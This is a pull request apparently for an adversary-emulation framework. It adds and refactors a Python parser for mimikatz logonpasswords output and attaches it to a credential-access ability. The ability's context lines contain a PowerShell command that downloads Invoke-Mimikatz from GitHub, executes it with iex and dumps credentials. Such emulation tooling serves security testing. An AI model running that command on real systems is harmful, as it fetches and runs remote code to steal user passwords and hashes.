### PR TITLE
virts-585

### DIFF
--- a/app/parsers/katz.py
+++ b/app/parsers/katz.py
@@ -1,0 +1,119 @@
+from plugins.stockpile.app.parsers.base_parser import BaseParser
+from plugins.stockpile.app.relationship import Relationship
+
+import re
+from collections import defaultdict
+
+class MimikatzBlock(object):
+    def __init__(self):
+        self.session = ""
+        self.username = ""
+        self.domain = ""
+        self.logon_server = ""
+        self.logon_time = ""
+        self.sid = ""
+        self.packages = defaultdict(list)
+
+
+class Katz(BaseParser):
+    def __init__(self, parser_info):
+        self.mappers = parser_info['mappers']
+        self.used_facts = parser_info['used_facts']
+        self.parse_base = 'wdigest'
+
+    def parse_kats(self, output):
+        """
+        Parses mimikatz output with the logonpasswords command and returns a list of dicts of the credentials.
+        Args:
+            output: stdout of "mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"
+        Returns:
+            A list of MimikatzSection objects
+        """
+        # split sections using "Authentication Id" as separator
+        sections = output.split("Authentication Id")
+        creds = []
+        for section in sections[1:]:
+            mk_section = MimikatzBlock()
+            package = {}
+            package_name = ""
+            in_header = True
+            for line in section.splitlines():
+                line = line.strip()
+                if in_header:
+                    if line.startswith('msv'):
+                        in_header = False
+                    else:
+                        session = re.match(r"^\s*Session\s*:\s*([^\r\n]*)", line)
+                        if session:
+                            mk_section.session = session.group(1)
+                        username = re.match(r"^\s*User Name\s*:\s*([^\r\n]*)", line)
+                        if username:
+                            mk_section.username = username.group(1)
+                        domain = re.match(r"^\s*Domain\s*:\s*([^\r\n]*)", line)
+                        if domain:
+                            mk_section.domain = domain.group(1)
+                        logon_server = re.match(r"^\s*Logon Server\s*:\s*([^\r\n]*)", line)
+                        if logon_server:
+                            mk_section.logon_server = logon_server.group(1)
+                        logon_time = re.match(r"^\s*Logon Time\s*:\s*([^\r\n]*)", line)
+                        if logon_time:
+                            mk_section.logon_time = logon_time.group(1)
+                        sid = re.match(r"^\s*SID\s*:\s*([^\r\n]*)", line)
+                        if sid:
+                            mk_section.sid = sid.group(1)
+                        continue
+
+                if line.startswith('['):
+                    # this might indicate the start of a new account
+                    if 'Username' in package and package['Username'] != '(null)' and \
+                            (('Password' in package and package['Password'] != '(null)') or 'NTLM' in package):
+                        mk_section.packages[package_name].append(package)
+
+                    # reset the package
+                    package = {}
+                    pass
+                elif line.startswith('*'):
+                    m = re.match(r"\s*\* (.*?)\s*: (.*)", line)
+                    if m:
+                        package[m.group(1)] = m.group(2)
+
+                elif line:
+                    # parse out the new section name
+                    match_group = re.match(r"([a-z]+) :", line)
+                    if match_group:
+                        # this is the start of a new ssp
+                        # save the current ssp if necessary
+                        if 'Username' in package and package['Username'] != '(null)' and \
+                                (('Password' in package and package['Password'] != '(null)') or 'NTLM' in package):
+                            mk_section.packages[package_name].append(package)
+
+                        # reset the package
+                        package = {}
+
+                        # get the new name
+                        package_name = match_group.group(1)
+
+            # save the current ssp if necessary
+            if 'Username' in package and package['Username'] != '(null)' and \
+                    (('Password' in package and package['Password'] != '(null)') or 'NTLM' in package):
+                mk_section.packages[package_name].append(package)
+
+            # save this section
+            if mk_section.packages:
+                creds.append(mk_section)
+
+        return creds
+
+    def parse(self, blob):
+        relationships = []
+        parse_data = self.parse_kats(blob)
+        for match in parse_data:
+            if self.parse_mode in match.packages:
+                for mp in self.mappers:
+                    relationships.append(
+                        Relationship(source=(mp.get('source'), match.package[self.parse_mode]['Username']),
+                                     edge=mp.get('edge'),
+                                     target=(mp.get('target'), match.package[self.parse_mode]['Password']))
+                    )
+        return relationships
+

--- a/app/parsers/katz.py
+++ b/app/parsers/katz.py
@@ -1,25 +1,27 @@
 from plugins.stockpile.app.parsers.base_parser import BaseParser
 from plugins.stockpile.app.relationship import Relationship
+from app.utility.logger import Logger
 
 import re
 from collections import defaultdict
 
 class MimikatzBlock(object):
     def __init__(self):
-        self.session = ""
-        self.username = ""
-        self.domain = ""
-        self.logon_server = ""
-        self.logon_time = ""
-        self.sid = ""
+        self.session = ''
+        self.username = ''
+        self.domain = ''
+        self.logon_server = ''
+        self.logon_time = ''
+        self.sid = ''
         self.packages = defaultdict(list)
 
 
-class Katz(BaseParser):
+class Parser(BaseParser):
     def __init__(self, parser_info):
         self.mappers = parser_info['mappers']
         self.used_facts = parser_info['used_facts']
-        self.parse_base = 'wdigest'
+        self.parse_mode = 'wdigest'
+        self.log = Logger('parsing_svc')
 
     def parse_kats(self, output):
         """
@@ -30,12 +32,12 @@ class Katz(BaseParser):
             A list of MimikatzSection objects
         """
         # split sections using "Authentication Id" as separator
-        sections = output.split("Authentication Id")
+        sections = output.split('Authentication Id')
         creds = []
-        for section in sections[1:]:
+        for section in sections:
             mk_section = MimikatzBlock()
             package = {}
-            package_name = ""
+            package_name = ''
             in_header = True
             for line in section.splitlines():
                 line = line.strip()
@@ -43,22 +45,22 @@ class Katz(BaseParser):
                     if line.startswith('msv'):
                         in_header = False
                     else:
-                        session = re.match(r"^\s*Session\s*:\s*([^\r\n]*)", line)
+                        session = re.match(r'^\s*Session\s*:\s*([^\r\n]*)', line)
                         if session:
                             mk_section.session = session.group(1)
-                        username = re.match(r"^\s*User Name\s*:\s*([^\r\n]*)", line)
+                        username = re.match(r'^\s*User Name\s*:\s*([^\r\n]*)', line)
                         if username:
                             mk_section.username = username.group(1)
-                        domain = re.match(r"^\s*Domain\s*:\s*([^\r\n]*)", line)
+                        domain = re.match(r'^\s*Domain\s*:\s*([^\r\n]*)', line)
                         if domain:
                             mk_section.domain = domain.group(1)
-                        logon_server = re.match(r"^\s*Logon Server\s*:\s*([^\r\n]*)", line)
+                        logon_server = re.match(r'^\s*Logon Server\s*:\s*([^\r\n]*)', line)
                         if logon_server:
                             mk_section.logon_server = logon_server.group(1)
-                        logon_time = re.match(r"^\s*Logon Time\s*:\s*([^\r\n]*)", line)
+                        logon_time = re.match(r'^\s*Logon Time\s*:\s*([^\r\n]*)', line)
                         if logon_time:
                             mk_section.logon_time = logon_time.group(1)
-                        sid = re.match(r"^\s*SID\s*:\s*([^\r\n]*)", line)
+                        sid = re.match(r'^\s*SID\s*:\s*([^\r\n]*)', line)
                         if sid:
                             mk_section.sid = sid.group(1)
                         continue
@@ -73,13 +75,13 @@ class Katz(BaseParser):
                     package = {}
                     pass
                 elif line.startswith('*'):
-                    m = re.match(r"\s*\* (.*?)\s*: (.*)", line)
+                    m = re.match(r'\s*\* (.*?)\s*: (.*)', line)
                     if m:
                         package[m.group(1)] = m.group(2)
 
                 elif line:
                     # parse out the new section name
-                    match_group = re.match(r"([a-z]+) :", line)
+                    match_group = re.match(r'([a-z]+) :', line)
                     if match_group:
                         # this is the start of a new ssp
                         # save the current ssp if necessary
@@ -106,14 +108,17 @@ class Katz(BaseParser):
 
     def parse(self, blob):
         relationships = []
-        parse_data = self.parse_kats(blob)
-        for match in parse_data:
-            if self.parse_mode in match.packages:
-                for mp in self.mappers:
-                    relationships.append(
-                        Relationship(source=(mp.get('source'), match.package[self.parse_mode]['Username']),
-                                     edge=mp.get('edge'),
-                                     target=(mp.get('target'), match.package[self.parse_mode]['Password']))
-                    )
+        try:
+            parse_data = self.parse_kats(blob)
+            for match in parse_data:
+                if self.parse_mode in match.packages:
+                    for mp in self.mappers:
+                        relationships.append(
+                            Relationship(source=(mp.get('source'), match.packages[self.parse_mode][0]['Username']),
+                                         edge=mp.get('edge'),
+                                         target=(mp.get('target'), match.packages[self.parse_mode][0]['Password']))
+                        )
+        except Exception as error:
+            self.log.warning('Mimikatz parser encountered an error - {}. Continuing...'.format(error))
         return relationships
 

--- a/app/parsers/katz.py
+++ b/app/parsers/katz.py
@@ -5,6 +5,7 @@ from app.utility.logger import Logger
 import re
 from collections import defaultdict
 
+
 class MimikatzBlock(object):
     def __init__(self):
         self.session = ''
@@ -17,13 +18,14 @@ class MimikatzBlock(object):
 
 
 class Parser(BaseParser):
+
     def __init__(self, parser_info):
         self.mappers = parser_info['mappers']
         self.used_facts = parser_info['used_facts']
         self.parse_mode = 'wdigest'
         self.log = Logger('parsing_svc')
 
-    def parse_kats(self, output):
+    def parse_katz(self, output):
         """
         Parses mimikatz output with the logonpasswords command and returns a list of dicts of the credentials.
         Args:
@@ -31,8 +33,7 @@ class Parser(BaseParser):
         Returns:
             A list of MimikatzSection objects
         """
-        # split sections using "Authentication Id" as separator
-        sections = output.split('Authentication Id')
+        sections = output.split('Authentication Id')  # split sections using "Authentication Id" as separator
         creds = []
         for section in sections:
             mk_section = MimikatzBlock()
@@ -45,8 +46,7 @@ class Parser(BaseParser):
                 if in_header:
                     in_header = self._parse_header(line, mk_section)
                     if in_header:
-                        continue #avoid excess parsing work
-
+                        continue  # avoid excess parsing work
                 pstate, package_name = self._process_package(line, package, package_name, mk_section)
                 if pstate:
                     pstate = False
@@ -55,17 +55,14 @@ class Parser(BaseParser):
             if 'Username' in package and package['Username'] != '(null)' and \
                     (('Password' in package and package['Password'] != '(null)') or 'NTLM' in package):
                 mk_section.packages[package_name].append(package)
-
-            # save this section
-            if mk_section.packages:
+            if mk_section.packages:  # save this section
                 creds.append(mk_section)
-
         return creds
 
     def parse(self, blob):
         relationships = []
         try:
-            parse_data = self.parse_kats(blob)
+            parse_data = self.parse_katz(blob)
             for match in parse_data:
                 if self.parse_mode in match.packages:
                     for mp in self.mappers:
@@ -78,56 +75,49 @@ class Parser(BaseParser):
             self.log.warning('Mimikatz parser encountered an error - {}. Continuing...'.format(error))
         return relationships
 
-    # Private Functions
+    """    PRIVATE FUNCTION     """
 
-    def _parse_header(self, line, mk_section):
-            if line.startswith('msv'):
-                return False
-            else:
-                session = re.match(r'^\s*Session\s*:\s*([^\r\n]*)', line)
-                if session:
-                    mk_section.session = session.group(1)
-                username = re.match(r'^\s*User Name\s*:\s*([^\r\n]*)', line)
-                if username:
-                    mk_section.username = username.group(1)
-                domain = re.match(r'^\s*Domain\s*:\s*([^\r\n]*)', line)
-                if domain:
-                    mk_section.domain = domain.group(1)
-                logon_server = re.match(r'^\s*Logon Server\s*:\s*([^\r\n]*)', line)
-                if logon_server:
-                    mk_section.logon_server = logon_server.group(1)
-                logon_time = re.match(r'^\s*Logon Time\s*:\s*([^\r\n]*)', line)
-                if logon_time:
-                    mk_section.logon_time = logon_time.group(1)
-                sid = re.match(r'^\s*SID\s*:\s*([^\r\n]*)', line)
-                if sid:
-                    mk_section.sid = sid.group(1)
-                return True
+    @staticmethod
+    def _parse_header(line, mk_section):
+        if line.startswith('msv'):
+            return False
+        session = re.match(r'^\s*Session\s*:\s*([^\r\n]*)', line)
+        if session:
+            mk_section.session = session.group(1)
+        username = re.match(r'^\s*User Name\s*:\s*([^\r\n]*)', line)
+        if username:
+            mk_section.username = username.group(1)
+        domain = re.match(r'^\s*Domain\s*:\s*([^\r\n]*)', line)
+        if domain:
+            mk_section.domain = domain.group(1)
+        logon_server = re.match(r'^\s*Logon Server\s*:\s*([^\r\n]*)', line)
+        if logon_server:
+            mk_section.logon_server = logon_server.group(1)
+        logon_time = re.match(r'^\s*Logon Time\s*:\s*([^\r\n]*)', line)
+        if logon_time:
+            mk_section.logon_time = logon_time.group(1)
+        sid = re.match(r'^\s*SID\s*:\s*([^\r\n]*)', line)
+        if sid:
+            mk_section.sid = sid.group(1)
+        return True
 
     def _process_package(self, line, package, package_name, mk_section):
         if line.startswith('['):
-            # this might indicate the start of a new account
-            self._package_extend(package, package_name, mk_section)
-
-            # reset the package
-            return True, package_name
+            self._package_extend(package, package_name, mk_section)  # this might indicate the start of a new account
+            return True, package_name  # reset the package
         elif line.startswith('*'):
             m = re.match(r'\s*\* (.*?)\s*: (.*)', line)
             if m:
                 package[m.group(1)] = m.group(2)
         elif line:
-            # parse out the new section name
-            match_group = re.match(r'([a-z]+) :', line)
-            if match_group:
-                # this is the start of a new ssp
-                # save the current ssp if necessary
-                self._package_extend(package, package_name, mk_section)
-
-                # reset the package
-                return True, match_group.group(1)
+            match_group = re.match(r'([a-z]+) :', line)  # parse out the new section name
+            if match_group:  # this is the start of a new ssp
+                self._package_extend(package, package_name, mk_section)  # save the current ssp if necessary
+                return True, match_group.group(1)  # reset the package
         return False, package_name
 
-    def _package_extend(self, package, package_name, mk_section):
+    @staticmethod
+    def _package_extend(package, package_name, mk_section):
         if 'Username' in package and package['Username'] != '(null)' and \
                 (('Password' in package and package['Password'] != '(null)') or 'NTLM' in package):
             mk_section.packages[package_name].append(package)

--- a/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml
+++ b/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml
@@ -15,3 +15,8 @@
           $web = (New-Object System.Net.WebClient);
           $result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
           iex $result; Invoke-Mimikatz -DumpCreds
+        parsers:
+          plugins.stockpile.app.parsers.katz:
+            - source: host.user.name
+              edge: has_password
+              target}: host.user.password

--- a/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml
+++ b/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml
@@ -19,4 +19,4 @@
           plugins.stockpile.app.parsers.katz:
             - source: host.user.name
               edge: has_password
-              target}: host.user.password
+              target: host.user.password


### PR DESCRIPTION
Restores mimikatz parsing capabilities, and bullet-proofs the parsing used for that functionality so that if an error occurs absolutely nothing happens to the operation (this does not prevent other parsing errors outside the mimikatz parser from stopping the operation). 

The parser itself is a bit extensive, and most of the information it extracts is currently discarded, however, I feel there is value in keeping the ability to extract this information, as there is a notable likelihood that the information will be useful for future abilities.